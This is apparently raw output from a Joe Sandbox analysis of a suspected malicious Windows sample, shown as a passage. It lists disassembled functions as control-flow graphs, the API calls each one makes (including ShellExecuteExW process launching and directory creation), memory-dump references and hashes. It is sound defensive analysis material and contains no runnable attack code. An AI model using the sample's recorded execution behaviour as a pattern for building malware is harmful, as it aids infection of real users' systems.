                                                                                          • Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                                          • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                                          • Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                                          • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1150 40236f-40238e LoadLibraryA GetProcAddress 1151 402390-40239b GetNativeSystemInfo 1150->1151 1152 40239c-40239f 1150->1152
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                          • String ID: GetNativeSystemInfo$kernel32
                                                                                          • API String ID: 2103483237-3846845290
                                                                                          • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                                          • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                                          • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                                          • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1361 403387-40339e GetFileAttributesW 1362 4033a0-4033a2 1361->1362 1363 4033a4-4033a6 1361->1363 1364 4033fd-4033ff 1362->1364 1365 4033b5-4033bc 1363->1365 1366 4033a8-4033b3 SetLastError 1363->1366 1367 4033c7-4033ca 1365->1367 1368 4033be-4033c5 call 40335a 1365->1368 1366->1364 1369 4033fa-4033fc 1367->1369 1370 4033cc-4033dd FindFirstFileW 1367->1370 1368->1364 1369->1364 1370->1368 1372 4033df-4033f8 FindClose CompareFileTime 1370->1372 1372->1368 1372->1369
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                                          • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 1799206407-0
                                                                                          • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                                          • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                                          • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                                          • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                                          APIs
                                                                                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                                          • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DiskFreeMessageSendSpace
                                                                                          • String ID:
                                                                                          • API String ID: 696007252-0
                                                                                          • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                                          • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                                          • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                                          • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 724 403400-403418 call 402823 727 4036a2-4036ae call 4025cd 724->727 730 4036b4-4036be ??3@YAXPAX@Z 727->730 731 40341d-403444 call 401458 * 2 call 402823 727->731 732 4036eb-4036f0 730->732 739 40345a-403466 call 401bbb 731->739 742 403446-403449 739->742 743 403468-40349a call 402ad8 call 4013a9 ??3@YAXPAX@Z * 2 739->743 742->743 744 40344b-403457 call 40292b 742->744 751 4036c0-4036c6 743->751 752 4034a0-4034af call 4025cd 743->752 744->739 754 4036ce-4036e9 call 402d30 call 40269a ??3@YAXPAX@Z 751->754 757 4034b5-4034be 752->757 758 4036c8-4036cb 752->758 754->732 757->758 760 4034c4-4034d1 call 4025cd 757->760 758->754 760->758 765 4034d7-4034e1 760->765 766 403501-403515 765->766 767 4034e3-4034e5 765->767 769 403593-4035a6 strncmp 766->769 767->758 768 4034eb-4034fc call 402662 767->768 778 40369a-40369d call 40269a 768->778 770 4035a8 769->770 771 40357e-403591 strncmp 769->771 774 4035cd-4035d4 770->774 771->769 773 403517-40351a 771->773 773->758 779 403520-40352f 773->779 776 4035d6-4035dc 774->776 777 4035aa-4035ad 774->777 780 4035e2-40360c call 402ad8 call 4013a9 ??3@YAXPAX@Z call 402dd6 776->780 784 4035de-4035df 776->784 777->776 783 4035af-4035b2 777->783 778->727 779->780 781 403535-403538 779->781 807 403611-403623 lstrcmpW 780->807 785 403573 781->785 786 40353a-403546 781->786 787 4035b4-4035b9 783->787 788 4035bc-4035c8 call 40292b 783->788 784->780 794 403576 785->794 790 403548-40354a 786->790 791 40356f-403571 786->791 787->788 792 4035bb 787->792 788->774 796 40356b-40356d 790->796 797 40354c-40354e 790->797 791->794 792->788 798 403579 call 40292b 794->798 796->794 801 403550-403555 797->801 802 403567-403569 797->802 798->771 805 403563-403565 801->805 806 403557-403561 call 40292b 801->806 802->794 805->798 806->794 809 403625-403633 call 40cc87 807->809 810 403639-403646 807->810 809->758 809->810 813 403648-403661 lstrlenW wcsncmp 810->813 814 40366e-40367f call 40261a 810->814 816 403663-403668 813->816 817 40366a-40366c 813->817 819 40368e-403695 call 4032d9 814->819 822 403681-40368c call 401370 814->822 816->813 816->817 817->814 817->819 819->778 822->778
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                                          • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                                            • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                                            • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: 0VA$SetEnvironment${\rtf
                                                                                          • API String ID: 613200358-2390373888
                                                                                          • Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                                          • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                                          • Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                                          • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 931 404f67-404fac call 401458 * 2 memset 936 404fb8-404fbc 931->936 937 404fae-404fb1 931->937 938 404fc5-404fdf call 404a97 call 401370 936->938 939 404fbe 936->939 937->936 944 404fe1-404fe9 ??3@YAXPAX@Z 938->944 945 404ffa-405012 ShellExecuteExW 938->945 939->938 946 404fec-404ff9 ??3@YAXPAX@Z 944->946 947 405014-40501b 945->947 948 40503a-40503c 945->948 949 405028-40502b CloseHandle 947->949 950 40501d-405022 WaitForSingleObject 947->950 951 405031-405038 ??3@YAXPAX@Z 948->951 949->951 950->949 951->946
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00404F8B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                                          • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                                          • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                                          • String ID: $gA
                                                                                          • API String ID: 2700081640-3949116232
                                                                                          • Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                                          • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                                          • Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                                          • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                                          • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                                          • DispatchMessageW.USER32(?), ref: 00401D73
                                                                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                          • String ID: Static
                                                                                          • API String ID: 2479445380-2272013587
                                                                                          • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                                          • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                                          • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                                          • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 955 4036f1-403717 lstrlenW call 402771 958 403722-40372e 955->958 959 403719-40371d call 401172 955->959 961 403730-403734 958->961 962 403736-40373c 958->962 959->958 961->962 963 40373f-403741 961->963 962->963 964 403765-40376e call 401b75 963->964 967 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 964->967 968 403754-403756 964->968 971 403785-403793 call 403387 967->971 972 40379c-4037a5 call 401b75 967->972 969 403743-40374b 968->969 970 403758-40375a 968->970 969->970 977 40374d-403751 969->977 973 403760 970->973 974 403814-40381a 970->974 971->972 985 403795-403797 971->985 986 4037b6-4037b8 972->986 987 4037a7-4037b4 call 408dbf 972->987 973->964 981 403844-403857 call 408dbf ??3@YAXPAX@Z 974->981 982 40381c-403827 974->982 977->970 978 403753 977->978 978->968 998 403859-40385d 981->998 982->981 983 403829-40382d 982->983 983->981 989 40382f-403834 983->989 993 403839-403842 ??3@YAXPAX@Z 985->993 990 403808-403812 ??3@YAXPAX@Z 986->990 991 4037ba-4037d9 memcpy 986->991 987->985 989->981 995 403836-403838 989->995 990->998 996 4037db 991->996 997 4037ee-4037f2 991->997 993->998 995->993 999 4037ed 996->999 1000 4037f4-403801 call 401b75 997->1000 1001 4037dd-4037e5 997->1001 999->997 1000->987 1005 403803-403806 1000->1005 1001->1000 1002 4037e7-4037eb 1001->1002 1002->999 1002->1000 1005->990 1005->991
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                                            • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                                            • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                                          • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 846840743-0
                                                                                          • Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                                          • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                                          • Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                                          • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1006 40f227-40f26f _EH_prolog call 40ef4a 1009 40f271-40f274 1006->1009 1010 40f277-40f27a 1006->1010 1009->1010 1011 40f290-40f2b5 1010->1011 1012 40f27c-40f281 1010->1012 1015 40f2b7-40f2bd 1011->1015 1013 40f283-40f285 1012->1013 1014 40f289-40f28b 1012->1014 1013->1014 1016 40f6f3-40f704 1014->1016 1017 40f2c3-40f2c7 1015->1017 1018 40f387-40f39a call 4011d1 1015->1018 1019 40f2c9-40f2cc 1017->1019 1020 40f2cf-40f2de 1017->1020 1026 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 1018->1026 1027 40f39c-40f3a6 call 40ef85 1018->1027 1019->1020 1022 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 1020->1022 1023 40f303-40f308 1020->1023 1043 40f2fb-40f301 1022->1043 1024 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 1023->1024 1025 40f30a-40f314 1023->1025 1029 40f353-40f369 1024->1029 1025->1024 1025->1029 1040 40f3e1-40f3fa call 40ef4a call 40dc14 1026->1040 1041 40f3d8-40f3df call 40dce7 1026->1041 1049 40f3aa-40f3ac 1027->1049 1037 40f36c-40f374 1029->1037 1042 40f376-40f385 call 40ef63 1037->1042 1037->1043 1059 40f3fd-40f420 call 40dc09 1040->1059 1041->1040 1042->1037 1043->1015 1049->1016 1063 40f422-40f427 1059->1063 1064 40f456-40f459 1059->1064 1067 40f429-40f42b 1063->1067 1068 40f42f-40f447 call 40f090 call 40ef85 1063->1068 1065 40f485-40f4a9 ??2@YAPAXI@Z 1064->1065 1066 40f45b-40f460 1064->1066 1072 40f4b4 1065->1072 1073 40f4ab-40f4b2 call 40f776 1065->1073 1069 40f462-40f464 1066->1069 1070 40f468-40f47e call 40f090 call 40ef85 1066->1070 1067->1068 1085 40f449-40f44b 1068->1085 1086 40f44f-40f451 1068->1086 1069->1070 1070->1065 1074 40f4b6-40f4cd call 40ef4a 1072->1074 1073->1074 1087 40f4db-40f500 call 40faff 1074->1087 1088 40f4cf-40f4d8 1074->1088 1085->1086 1086->1016 1092 40f502-40f507 1087->1092 1093 40f543-40f546 1087->1093 1088->1087 1096 40f509-40f50b 1092->1096 1097 40f50f-40f514 1092->1097 1094 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 1093->1094 1095 40f6ae-40f6b3 1093->1095 1113 40f5ae-40f5b3 1094->1113 1098 40f6b5-40f6b6 1095->1098 1099 40f6bb-40f6df 1095->1099 1096->1097 1101 40f516-40f518 1097->1101 1102 40f51c-40f534 call 40f090 call 40ef85 1097->1102 1098->1099 1099->1016 1099->1059 1101->1102 1111 40f536-40f538 1102->1111 1112 40f53c-40f53e 1102->1112 1111->1112 1112->1016 1114 40f615-40f61b 1113->1114 1115 40f5b5 1113->1115 1117 40f621-40f623 1114->1117 1118 40f61d-40f61f 1114->1118 1116 40f5b7 1115->1116 1119 40f5ba-40f5c3 call 40faac 1116->1119 1120 40f5c5-40f5c7 1117->1120 1121 40f625-40f631 1117->1121 1118->1116 1119->1120 1131 40f602-40f604 1119->1131 1123 40f5c9-40f5ca 1120->1123 1124 40f5cf-40f5d1 1120->1124 1125 40f633-40f635 1121->1125 1126 40f637-40f63d 1121->1126 1123->1124 1128 40f5d3-40f5d5 1124->1128 1129 40f5d9-40f5f1 call 40f090 call 40ef85 1124->1129 1125->1119 1126->1099 1130 40f63f-40f645 1126->1130 1128->1129 1129->1049 1139 40f5f7-40f5fd 1129->1139 1130->1099 1133 40f606-40f608 1131->1133 1134 40f60c-40f610 1131->1134 1133->1134 1134->1099 1139->1049
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040F230
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                                            • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$H_prolog
                                                                                          • String ID: pmA${D@
                                                                                          • API String ID: 3431946709-901781089
                                                                                          • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                                          • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                                          • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                                          • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1142 401b75-401b84 CreateDirectoryW 1143 401bb6-401bba 1142->1143 1144 401b86-401b93 GetLastError 1142->1144 1145 401ba0-401bad GetFileAttributesW 1144->1145 1146 401b95 1144->1146 1145->1143 1148 401baf-401bb1 1145->1148 1147 401b96-401b9f SetLastError 1146->1147 1148->1143 1149 401bb3-401bb4 1148->1149 1149->1147
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                                          • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                                          • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                          • String ID: k7@
                                                                                          • API String ID: 635176117-1561861239
                                                                                          • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                                          • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                                          • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                                          • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1153 40e9ef-40ea0a call 410a40 1156 40ea19-40ea52 call 406eb0 call 40f707 1153->1156 1157 40ea0c-40ea16 1153->1157 1162 40eb20-40eb46 call 40e79c call 40e6d7 1156->1162 1163 40ea58-40ea62 ??2@YAPAXI@Z 1156->1163 1175 40eb64-40eb7c call 40cdda call 401132 1162->1175 1176 40eb48-40eb5e call 40e2e8 1162->1176 1165 40ea71 1163->1165 1166 40ea64-40ea6f 1163->1166 1167 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1165->1167 1166->1167 1173 40eabe 1167->1173 1174 40eaae-40eabc 1167->1174 1177 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1173->1177 1174->1177 1190 40ebb4-40ebc4 1175->1190 1191 40eb7e-40eb8b ??2@YAPAXI@Z 1175->1191 1176->1175 1184 40ece0-40ecf7 1176->1184 1206 40eb01-40eb06 1177->1206 1207 40eafb-40eafd 1177->1207 1195 40ee93-40eeae call 40e27a 1184->1195 1196 40ecfd 1184->1196 1208 40ebf4-40ebfa 1190->1208 1209 40ebc6 1190->1209 1192 40eb96 1191->1192 1193 40eb8d-40eb94 call 40e7c1 1191->1193 1198 40eb98-40eba8 call 40f707 1192->1198 1193->1198 1212 40eeb0-40eeb6 1195->1212 1213 40eeb9-40eebc 1195->1213 1202 40ed00-40ed30 1196->1202 1221 40ebaa-40ebad 1198->1221 1222 40ebaf 1198->1222 1219 40ed60-40eda6 call 40cd11 * 2 1202->1219 1220 40ed32-40ed38 1202->1220 1217 40eb08-40eb0a 1206->1217 1218 40eb0e-40eb1a 1206->1218 1207->1206 1214 40ec00-40ec20 call 40cf2f 1208->1214 1215 40ecce-40ecdd call 40e977 1208->1215 1216 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1209->1216 1212->1213 1213->1216 1224 40eec2-40eee9 call 40cd11 1213->1224 1234 40ec25-40ec2d 1214->1234 1215->1184 1216->1208 1217->1218 1218->1162 1218->1163 1264 40ee10 1219->1264 1265 40eda8-40edab 1219->1265 1228 